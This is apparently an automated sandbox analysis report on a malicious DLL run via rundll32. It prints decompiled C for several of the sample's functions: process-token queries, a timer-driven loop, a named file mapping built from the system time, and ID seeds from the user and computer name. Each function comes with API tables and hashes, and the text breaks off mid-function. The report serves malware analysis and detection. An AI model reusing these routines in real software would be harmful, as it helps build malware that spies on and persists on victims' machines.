                                0x00000000
                                0x00000000
                                0x046110f0
                                0x046110f0
                                0x04611102
                                0x04611106
                                0x04611118
                                0x04611118
                                0x04611128
                                0x0461112b
                                0x04611130
                                0x04611134
                                0x0461113a

                                APIs
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046110E6
                                • Sleep.KERNEL32(0000000A,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 046110F0
                                • HeapFree.KERNEL32(00000000,00000000,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 04611118
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04611134
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 53e7faff618f98261121b67780dc243eca36c08b628956bf1587179915365760
                                • Instruction ID: adb7c6c7216703da868262837487d18a18abce13bfbef0370c1bfc64d7155c71
                                • Opcode Fuzzy Hash: 53e7faff618f98261121b67780dc243eca36c08b628956bf1587179915365760
                                • Instruction Fuzzy Hash: ACF03AB0702250DBE7208FB8D949B5677A4EB19746B0C900AF645C7271F628EC04DB29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046150DF, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E046150DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x461a37c; // 0x53c9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x461a37c; // 0x53c9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x461a37c; // 0x53c9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x461b83e) {
					HeapFree( *0x461a290, 0, _t10);
					_t7 =  *0x461a37c; // 0x53c9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x046150df
                                0x046150e8
                                0x046150f8
                                0x046150f8
                                0x046150fd
                                0x04615102
                                0x00000000
                                0x00000000
                                0x046150f2
                                0x046150f2
                                0x04615104
                                0x04615109
                                0x0461510d
                                0x04615120
                                0x04615126
                                0x04615126
                                0x0461512f
                                0x04615131
                                0x04615135
                                0x0461513b

                                APIs
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046150E8
                                • Sleep.KERNEL32(0000000A,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 046150F2
                                • HeapFree.KERNEL32(00000000,?,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 04615120
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04615135
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: de659bcd4db5a45b9f5af8e28edfd020e45ff7d2e86af8af5c9f367310c62d35
                                • Instruction ID: b6b8c09a511feeb061a6bf1113fb861247556a0bf0b2fa371ae991be9784c657
                                • Opcode Fuzzy Hash: de659bcd4db5a45b9f5af8e28edfd020e45ff7d2e86af8af5c9f367310c62d35
                                • Instruction Fuzzy Hash: 74F0D4B4601200EBE718DFA4E869B2577A4EB59B06B0D501AE906D7370F738EC04DA25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04613D98, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E04613D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04616837(_t2);
				if(_t34 != 0) {
					_t30 = E04616837(_t28);
					if(_t30 == 0) {
						E046150CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E046177DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E046177DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x04613d98
                                0x04613da2
                                0x04613da4
                                0x04613daa
                                0x04613daa
                                0x04613db3
                                0x04613db7
                                0x04613dc3
                                0x04613dc7
                                0x04613e3b
                                0x04613dc9
                                0x04613dc9
                                0x04613dcd
                                0x04613dd4
                                0x04613dd7
                                0x04613df1
                                0x04613de0
                                0x04613de0
                                0x04613de4
                                0x04613de7
                                0x04613dec
                                0x04613dec
                                0x04613df6
                                0x04613e1e
                                0x04613e24
                                0x04613e27
                                0x04613df8
                                0x04613dfa
                                0x04613e02
                                0x04613e0d
                                0x04613e12
                                0x04613e12
                                0x04613e2e
                                0x04613e35
                                0x04613e36
                                0x04613e36
                                0x04613dc7
                                0x04613e46

                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E,?,053C9698), ref: 04613DA4
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                  • Part of subcall function 046177DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04613DD2,00000000,00000001,00000001,?,?,04613CEE,00000000,00000000,00000000,053C9698), ref: 046177EB
                                  • Part of subcall function 046177DD: StrChrA.SHLWAPI(?,0000003F,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E,?,053C9698,0000EA60,?), ref: 046177F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E), ref: 04613E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04613E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04613E1E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 1c074ca70222f56d7914e037075de6066754d9460acd5102e1c78c4309844262
                                • Instruction ID: 37ed31e47f9bb96006e006922b31aa92a317ba81e95b44705cbf09d56fd657ff
                                • Opcode Fuzzy Hash: 1c074ca70222f56d7914e037075de6066754d9460acd5102e1c78c4309844262
                                • Instruction Fuzzy Hash: 9821A571500255ABEB129F74C894AAA7FB8DF16344F0C405AFC059B321F735E981C7A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615D37, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04615D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04616837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x04615d4c
                                0x04615d50
                                0x04615d5a
                                0x04615d61
                                0x04615d64
                                0x04615d66
                                0x04615d6e
                                0x04615d73
                                0x04615d81
                                0x04615d86
                                0x04615d90

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,053C92FC,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D47
                                • lstrlenW.KERNEL32(04611B37,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D4E
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04611B37,004F0053,053C92FC,?,?,?,?,?,?,046120B0), ref: 04615D6E
                                • memcpy.NTDLL(751469A0,04611B37,00000002,00000000,004F0053,751469A0,?,?,04611B37,004F0053,053C92FC), ref: 04615D81
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 2b9ce588603981112eeb5cffa8d6ba7a35c65d5b515d1bbdc8e6e738f2c8557d
                                • Instruction ID: 43abee99aebdf6c630b7472fc7995b43de38f7579f2fdf40d50b25ff9ee62aa2
                                • Opcode Fuzzy Hash: 2b9ce588603981112eeb5cffa8d6ba7a35c65d5b515d1bbdc8e6e738f2c8557d
                                • Instruction Fuzzy Hash: 8CF04976900118BBCF10EFA8CC84CDE7BACEF082987094066F908D7211F775EA14DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046121C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                • lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                • lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: e67d69820802fca6e57144dd7ab894177bb0b5cbeea451b8d1e0a64503b377d8
                                • Instruction ID: 21416b5107dde46f4e71a165859a56571c5b5dede87ba7d75101a031478f3d31
                                • Opcode Fuzzy Hash: e67d69820802fca6e57144dd7ab894177bb0b5cbeea451b8d1e0a64503b377d8
                                • Instruction Fuzzy Hash: C5E012B39012656787119BE49C58CAFBBADEF9975230D045BFA00D3120E728DD09DBE5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 3336 Parent PID: 4632 rundll32.exeCOMMON

                                Executed Functions

                                Function 04812D06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E04812D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04816837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E048150CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x04812d13
                                0x04812d14
                                0x04812d15
                                0x04812d16
                                0x04812d17
                                0x04812d1b
                                0x04812d22
                                0x04812d31
                                0x04812d34
                                0x04812d37
                                0x04812d3e
                                0x04812d41
                                0x04812d44
                                0x04812d47
                                0x04812d4a
                                0x04812d55
                                0x04812d57
                                0x04812d60
                                0x04812d68
                                0x04812d6a
                                0x04812d7c
                                0x04812d86
                                0x04812d8a
                                0x04812d99
                                0x04812d9d
                                0x04812da6
                                0x04812dae
                                0x04812dae
                                0x04812db0
                                0x04812db0
                                0x04812db8
                                0x04812dbe
                                0x04812dc2
                                0x04812dc2
                                0x04812dcd

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04812D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04812D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04812D7C
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04812D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04812DA6
                                • NtClose.NTDLL(00000000), ref: 04812DB8
                                • NtClose.NTDLL(00000000), ref: 04812DC2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 7f81f0fe24d783f68b3452443087fc4e5a44ae86f90dfe2fb9bc82d5a99838f1
                                • Instruction ID: 3b2f5d31eff9542dc6e4349a2701c7a3086ddeb64ac7aa16d976dfc9401d9763
                                • Opcode Fuzzy Hash: 7f81f0fe24d783f68b3452443087fc4e5a44ae86f90dfe2fb9bc82d5a99838f1
                                • Instruction Fuzzy Hash: F321F4B2900218BBDB01AF94CC459DEBFBDEF08750F1045A6F904E6160E7B59A80DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04812022, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 83%
                                			E04812022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x481a298);
					_v20 = 0;
					_v16 = 0;
					L04817D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x481a2c4; // 0x34c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x481a2a4 = 5;
						} else {
							_t69 = E04811AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x481a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E04815F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04813032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x481a29c);
							goto L21;
						} else {
							__eflags =  *0x481a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04811492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x481a2a0);
								L21:
								L04817D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x481a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x04812022
                                0x04812034
                                0x04812037
                                0x04812043
                                0x0481204b
                                0x0481204e
                                0x048121b4
                                0x04812054
                                0x04812054
                                0x04812056
                                0x0481205b
                                0x0481205c
                                0x04812062
                                0x04812065
                                0x04812068
                                0x04812076
                                0x04812081
                                0x04812084
                                0x04812086
                                0x04812093
                                0x0481209d
                                0x048120a1
                                0x048120a4
                                0x048120a9
                                0x048120b4
                                0x048120b4
                                0x048120ab
                                0x048120ab
                                0x048120b2
                                0x00000000
                                0x00000000
                                0x048120b2
                                0x048120be
                                0x00000000
                                0x048120c1
                                0x048120c5
                                0x048120d0
                                0x048120d0
                                0x048120d7
                                0x048120dc
                                0x048120e3
                                0x048120ec
                                0x048120f2
                                0x048120f5
                                0x048120fc
                                0x048120ff
                                0x00000000
                                0x00000000
                                0x04812101
                                0x04812104
                                0x04812107
                                0x0481210a
                                0x00000000
                                0x0481210c
                                0x0481211b
                                0x0481211b
                                0x00000000
                                0x04812149
                                0x04812149
                                0x0481214e
                                0x0481216d
                                0x0481216f
                                0x04812174
                                0x04812175
                                0x00000000
                                0x04812150
                                0x04812150
                                0x04812156
                                0x00000000
                                0x04812158
                                0x04812158
                                0x0481215d
                                0x0481215f
                                0x04812164
                                0x04812165
                                0x0481217b
                                0x0481217b
                                0x04812183
                                0x0481218e
                                0x04812191
                                0x0481219c
                                0x0481219e
                                0x048121a0
                                0x048121a3
                                0x00000000
                                0x048121a9
                                0x00000000
                                0x048121a9
                                0x048121a3
                                0x04812156
                                0x00000000
                                0x0481214e
                                0x0481211e
                                0x04812120
                                0x04812123
                                0x04812124
                                0x04812124
                                0x04812128
                                0x04812132
                                0x04812132
                                0x04812138
                                0x0481213b
                                0x0481213b
                                0x04812141
                                0x04812141
                                0x048121be
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 04812037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04812043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04812068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04812084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0481209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04812132
                                • CloseHandle.KERNEL32(?), ref: 04812141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0481217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0481560C), ref: 04812191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0481219C
                                  • Part of subcall function 04811AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,068D9340,?,00000000,30314549,00000014,004F0053,068D92FC), ref: 04811BA4
                                  • Part of subcall function 04811AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,048120B0), ref: 04811BB6
                                • GetLastError.KERNEL32 ref: 048121AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 641d9fc351fa46b4f6d6dfa328ff696cd9fc6e4ae81a54b0bbe0e9f99d866672
                                • Instruction ID: 46aff667004e2188da68488a7c1dd27006ed5d6fecac74efd5ed264e3d4be92c
                                • Opcode Fuzzy Hash: 641d9fc351fa46b4f6d6dfa328ff696cd9fc6e4ae81a54b0bbe0e9f99d866672
                                • Instruction Fuzzy Hash: 5F5149B1901228AEDF11EF95DC449EEBFBDEF08724F204A57E514F21A0D775AA40CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04816384, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E04816384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04817D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x481a2d4; // 0x20bd5a8
				_t5 = _t13 + 0x481b8a2; // 0x68d8e4a
				_t6 = _t13 + 0x481b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04817A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x481a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x04816384
                                0x0481638c
                                0x04816390
                                0x04816396
                                0x0481639b
                                0x048163a0
                                0x048163a3
                                0x048163a6
                                0x048163ab
                                0x048163ac
                                0x048163af
                                0x048163b4
                                0x048163bb
                                0x048163c5
                                0x048163c7
                                0x048163c8
                                0x048163cb
                                0x048163e7
                                0x048163ed
                                0x048163f1
                                0x0481643f
                                0x048163f3
                                0x04816400
                                0x04816410
                                0x04816418
                                0x0481642a
                                0x0481642e
                                0x00000000
                                0x00000000
                                0x0481641a
                                0x0481641d
                                0x04816422
                                0x04816424
                                0x04816424
                                0x04816402
                                0x04816404
                                0x04816430
                                0x04816431
                                0x04816431
                                0x04816400
                                0x04816446

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04815488,?,00000001,?), ref: 04816390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 048163A6
                                • _snwprintf.NTDLL ref: 048163CB
                                • CreateFileMappingW.KERNELBASE(000000FF,0481A2F8,00000004,00000000,00001000,?), ref: 048163E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488,?), ref: 048163F9
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04816410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488), ref: 04816431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04815488,?), ref: 04816439
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: e8d6c701158c89015debf0ba868bdb38657ae10730e67aad51cd9cd01864e33f
                                • Instruction ID: 12189efb1979b933d673b6194c17b1020b721336fbd69cd58bd366ebf66da657
                                • Opcode Fuzzy Hash: e8d6c701158c89015debf0ba868bdb38657ae10730e67aad51cd9cd01864e33f
                                • Instruction Fuzzy Hash: DC21C3B2B00228BBD711AB68DC05F9D77ADEF44750F204A27F905F71A0EA70AA01CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04814454, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E04814454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x481a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0481143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x481a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x481a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0481283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x481a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
